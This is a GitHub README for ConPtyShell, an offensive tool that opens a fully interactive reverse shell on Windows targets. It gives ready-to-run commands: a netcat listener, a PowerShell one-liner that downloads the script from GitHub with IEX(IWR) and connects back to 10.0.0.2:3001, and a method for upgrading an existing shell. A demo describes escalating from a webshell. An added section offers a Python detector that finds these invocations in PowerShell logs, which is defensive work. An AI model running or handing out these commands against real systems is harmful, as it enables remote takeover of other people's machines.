antonioCoco / Conptyshell

Licence: mit
ConPtyShell - Fully Interactive Reverse Shell for Windows

ConPtyShell

ConPtyShell is a Fully Interactive Reverse Shell for Windows systems.

The introduction of the Pseudo Console (ConPty) in Windows has greatly improved the way Windows handles terminals. ConPtyShell uses this feature to literally transform your bash into a remote PowerShell.

Briefly, it creates a Pseudo Console and attaches 2 pipes.
Then it creates the shell process (default powershell.exe) attaching the Pseudo Console with redirected input/output.
It then starts 2 threads for async I/O:
- one thread for reading from the socket and writing to Pseudo Console input pipe;
- the second thread for reading from the Pseudo Console output pipe and writing to the socket.

ConPtyShell also has the magic button "Upgrade to fully interactive" for your reverse shell; just use it as you need :)

For more information about ConPty, see the great article [1] in the references section.

NOTE: ConPtyShell uses the function CreatePseudoConsole(). This function has been available since Windows 10 / Windows Server 2019 version 1809 (build 10.0.17763).

NOTE2: If ConPTY is not available on the target system, you will get a normal netcat-like interactive shell.

Requirements

Client Side: Windows version >= 10 / 2019 1809 (build >= 10.0.17763)

Server Side: any tcp listener, i.e. netcat

Usage

It's important to have the same rows and cols size between your terminal and the remote terminal if you want to have an aligned output on the shell.

Method 1

In this method the terminal size is set without you passing the rows and cols parameters to the Invoke-ConPtyShell function:

Server Side:
stty raw -echo; (stty size; cat) | nc -lvnp 3001
Client Side:
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001

or, if you upload the ps1:

IEX(Get-Content .\Invoke-ConPtyShell.ps1 -Raw); Invoke-ConPtyShell 10.0.0.2 3001

Method 2

If you prefer more freedom over the TCP listener and your terminal, you can get the reverse shell in a "manual" way. In this case it's important that you set the rows and cols size when calling the Invoke-ConPtyShell function:

Server Side:
stty size
nc -lvnp 3001
Wait For connection
ctrl+z
stty raw -echo
fg[ENTER]
Client Side:

Here you should use the values read from the stty size command for the -Rows and -Cols parameters:

IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 24 -Cols 80

or, if you upload the ps1:

IEX(Get-Content .\Invoke-ConPtyShell.ps1 -Raw); Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 24 -Cols 80

Method 3 - Upgrade

You can also upgrade your current shell to a fully interactive shell. In this case it's important that you set the rows and cols size when calling the Invoke-ConPtyShell function:

WARN1: Do not use Invoke-WebRequest if you load the assembly directly in powershell because ConPtyShell won't work properly when multiple sockets (and multiple \Device\Afd) are found in the current process

WARN2: Only sockets created with the flag WSA_FLAG_OVERLAPPED are compatible with the upgrade. Non-overlapped sockets won't give a nice upgraded shell, and it will have locks on I/O operations.

Server Side:
stty size
nc -lvnp 3001
Wait For connection
ctrl+z
stty raw -echo
fg[ENTER]
Client Side:

Here you should use the values read from the stty size command for the -Rows and -Cols parameters:

IEX(Get-Content .\Invoke-ConPtyShell.ps1 -Raw); Invoke-ConPtyShell -Upgrade -Rows 24 -Cols 80
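
For defenders, the three usage methods above leave recognisable strings in PowerShell command-line or script block log text. The following is an added example (not part of ConPtyShell or the original page) that parses such text for the function name and parameters shown above; the sample records are constructed, and the names analyze, scan and SAMPLES are hypothetical.

```python
import re

# Patterns built from the usage commands shown on this page.
CALL = re.compile(r"\bInvoke-ConPtyShell(?![\w.])(?P<args>[^;|\r\n]*)", re.I)
NAMED = re.compile(r"-(RemoteIp|RemotePort|Rows|Cols)\s+(\S+)", re.I)
POSITIONAL = re.compile(r"\s*(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")
UPGRADE = re.compile(r"-Upgrade\b", re.I)
IEX_LOAD = re.compile(r"\bIEX\s*\(\s*(?:IWR|Invoke-WebRequest|Get-Content)\b", re.I)


def analyze(text):
    """Return a finding for one logged command or script block, else None."""
    call = CALL.search(text)
    if call is None:  # e.g. the .ps1 file is only named, not invoked
        return None
    args = call.group("args")
    named = {k.lower(): v for k, v in NAMED.findall(args)}
    pos = POSITIONAL.match(args)  # Method 1 passes IP and port positionally
    return {
        "mode": "upgrade" if UPGRADE.search(args) else "connect",
        "remote_ip": named.get("remoteip") or (pos.group(1) if pos else None),
        "remote_port": named.get("remoteport") or (pos.group(2) if pos else None),
        "size": (named.get("rows"), named.get("cols")),
        "iex_load": bool(IEX_LOAD.search(text)),
    }


# Constructed sample records (not real logs), modelled on the commands above.
SAMPLES = [
    "IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/"
    "Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001",
    r"IEX(Get-Content .\Invoke-ConPtyShell.ps1 -Raw); Invoke-ConPtyShell "
    "-RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 24 -Cols 80",
    r"IEX(Get-Content .\Invoke-ConPtyShell.ps1 -Raw); Invoke-ConPtyShell -Upgrade -Rows 24 -Cols 80",
    r"Get-ChildItem C:\Tools\Invoke-ConPtyShell.ps1",
]


def scan(records):
    """Return (record_index, finding) pairs for records that invoke the function."""
    hits = []
    for i, text in enumerate(records):
        finding = analyze(text)
        if finding:
            hits.append((i, finding))
    return hits


if __name__ == "__main__":
    for idx, finding in scan(SAMPLES):
        print(idx, finding)
```

This matches the default function and parameter names only, so treat it as one signal alongside process and network telemetry.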

Change Console Size

In any case, if you resize your terminal while the remote shell is already open, you can change the rows and cols size directly from PowerShell by pasting the following code:

$width=80
$height=24
$Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height)
$Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height)

Demo

In the video below you can watch a simulated scenario where on the left terminal I have limited access to the server through a webshell, and on the right I spawn a fully interactive reverse shell and play around:

Upgrade demo

References

  1. https://devblogs.microsoft.com/commandline/windows-command-line-introducing-the-windows-pseudo-console-conpty/
  2. https://github.com/microsoft/terminal
  3. https://www.usenix.org/conference/usenixsecurity20/presentation/niakanlahiji
  4. https://adepts.of0x.cc/shadowmove-hijack-socket/

Credits

  • LupMan